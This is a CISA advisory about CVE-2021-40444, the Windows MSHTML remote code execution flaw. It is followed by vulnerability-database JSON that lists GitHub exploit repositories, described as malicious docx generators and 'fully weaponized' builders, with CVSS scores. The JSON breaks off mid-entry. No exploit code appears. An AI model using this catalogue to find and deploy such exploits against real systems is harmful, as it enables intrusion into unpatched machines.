Microsoft has released mitigations and workarounds to address a remote code execution vulnerability (CVE-2021-40444) in Microsoft Windows. Exploitation of this vulnerability may allow a remote attacker to take control of an affected system. This vulnerability has been detected in exploits in the wild.
CISA encourages users and administrators to review [Microsoft’s advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444 >) and to implement the mitigations and workarounds.
This product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.
**Please share your thoughts.**
We recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/microsoft-releases-mitigations-and-workarounds-cve-2021-40444>); we'd welcome your feedback.
{"githubexploit": [{"lastseen": "2021-12-10T15:35:39", "description": "# cve-2021-40444\nReverse engineering the \"A Letter Before Court ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-12T09:27:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-12T12:00:29", "id": "E06577DB-A581-55E1-968E-81430C294A84", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:29", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T20:32:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-18T19:46:25", "id": "7DE60C34-40B8-50E4-B1A0-FC1D10F97677", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:03:37", "description": "# CVE-2021-40444-URL-Extractor\n\nPython script to extract embedde...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T16:54:50", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-20T19:01:48", "id": "0E965070-1EAE-59AA-86E6-41ADEFDAED7D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-10-28T22:01:11", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-25T05:13:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-25T05:13:19", "id": "7643EC22-CCD0-56A6-9113-B5EF435E22FC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-10-28T17:07:27", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-22T13:29:20", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-22T13:41:39", "id": "DD5D2BF7-BE9D-59EA-8DF2-D85AEC13A4A0", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-10-28T17:11:52", "description": "# CVE-2021-40444_CAB_archives\nCVE-2021-40444 - Custom CAB templa...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-24T10:59:34", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-15T00:43:34", "id": "B7D137AD-216F-5D27-9D7B-6F3B5EEB266D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:25", "description": "# CVE-2021-40444 docx Generate\ndocx generating to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T05:31:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-14T23:45:35", "id": "0990FE6E-7DC3-559E-9B84-E739872B988C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-10-28T17:12:14", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-24T23:17:12", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-24T23:17:28", "id": "CC6DFDC6-184F-5748-A9EC-946E8BA5FB04", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:54", "description": "# Caboom\n\n```\n \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557 \u2588...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-11T16:31:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-13T12:52:15", "id": "6BC80C90-569E-5084-8C0E-891F12F1805E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:39", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T09:21:29", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-20T15:39:54", "id": "0D0DAF60-4F3C-5B17-8BAB-5A8A73BC25CC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:08", "description": "MSHTMHell: Malicious document bui...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T15:33:41", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T13:49:09", "id": "588DA6EE-E603-5CF2-A9A3-47E98F68926C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:20", "description": "# CVE-2021-40444\nCVE-2021-40444 POC\n\n-----BEGIN PUBLIC KEY-----\n...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-09T02:30:26", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-17T10:41:29", "id": "37D2BE4F-9D7A-51CD-B802-2FAB35B39A4E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:23:03", "description": "# CVE-2021-40444-CAB\nCVE-2021-40444 - Custom CAB templates from ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T10:14:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-09T17:56:16", "id": "24DE1902-4427-5442-BF63-7657293966E2", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-09T21:51:56", "description": "# Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-08T08:32:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-09T21:16:38", "id": "FBB2DA29-1A11-5D78-A28C-1BF3821613AC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:39", "description": "\"Fork\" of [lockedbytes](https://github.com/lockedbyte) CVE-2021-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T13:45:36", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-15T14:42:59", "id": "F5CEF191-B04C-5FC5-82D1-3B728EC648A9", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:00", "description": "# CVE-2021-40444 Analysis\n\nThis repository contains the deobfusc...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-09T15:43:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T08:18:40", "id": "7333A285-768C-5AD9-B64E-0EC75F075597", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-24T12:46:04", "description": "# CVE-2021-40444 docx Generate\n.docx generate...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T02:49:37", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-24T11:57:05", "id": "88EFCA30-5DED-59FB-A476-A92F53D1497E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-15T21:37:40", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T16:55:53", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-08-15T15:41:32", "id": "72881C31-5BFD-5DAF-9D20-D6170EEC520D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-11-09T22:17:33", "description": "# Microsoft-Office-Word-MSHTML-Remote-Code-Exe...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-19T08:16:07", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-11-09T18:14:50", "id": "AAFEAA7E-81B7-5CE7-9E2F-16828CC5468F", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": 